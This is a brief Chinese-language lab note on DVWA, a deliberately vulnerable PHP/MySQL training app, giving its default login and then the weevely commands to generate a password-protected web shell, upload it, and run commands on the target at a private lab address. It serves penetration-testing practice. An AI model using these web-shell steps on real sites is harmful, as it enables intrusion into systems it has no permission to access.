一、DVWA
是一種基於PHP/Mysql的web應用程序,容易受到攻擊。
將DVWA security設置爲low
賬號密碼默認爲:admin password
DVMA模塊:
二、weevely
(1)用來創建shell.php,其中密碼是在步驟3使用
weevely generate [psw] [存放路徑]
如:
weevely generate 123456 /root/shell.php
(2)將shell.php上傳到目標網站
(3)weevely與目標網站進行交互,命令如下:
weevely [上傳文件的url] [psw]
如:
weevely http://10.0.2.4/dvwa/hackable/uploads/shell.php 123456
在weevely輸入命令後可在目標電腦執行,且能看到執行結果。